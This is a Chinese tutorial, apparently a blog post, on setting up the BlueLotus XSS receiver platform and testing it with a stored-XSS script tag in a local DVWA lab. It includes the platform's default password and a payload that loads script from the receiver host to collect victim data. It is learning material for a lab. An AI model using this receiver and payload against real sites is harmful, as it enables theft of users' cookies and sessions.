数据来源
本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。
xss漏洞接收平台-蓝莲花:
1)下载并安装Phpstudy(安装过程可以一路下一步,也可以改安装路径) http://public.xp.cn/upgrades/PhpStudy2018.zip
安装完成后启动服务
2)将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹
3) 在浏览器中输入:http://127.0.0.1/BlueLotus_XSSReceiver # 访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件,进入安装界面(注意:win7虚拟机安装后的蓝莲花平台界面显示不全,我这里只是用来演示安装过程,建议在windows10以上安装)
这里输入刚才我们的登录密码进行登录操作: bluelotus
4)配置XSS接收平台 - 蓝莲花
// 如果你的平台的文件名跟我的一样是BlueLotus_XSSReceiver就直接复制粘贴,不是就把这个名称改成自己的
http://127.0.0.1/BlueLotus_XSSReceiver/index.php
然后在这句前端代码复制保存下来,等下要用
<script src="http://127.0.0.1/BlueLotus_XSSReceiver/myjs/text.js"></script>
5)测试XSS接收平台是否配置成功了(我这里用DVWA靶场测试,攻击他人网站是犯法的)
打开我们本地的DVWA靶场,把安全等级调低然后选择XSS存储
但是到这里你就会发现我们粘贴的连接没有显示完整,这是因为前端开发人员在写这个页面时给这个留言框添加了字数限制,把限制调大就好
最后切换回XSS的接收平台蓝莲花
生成JS文件时选择的模板不同接收到的信息也会不同
XSS绕过
XSS防御
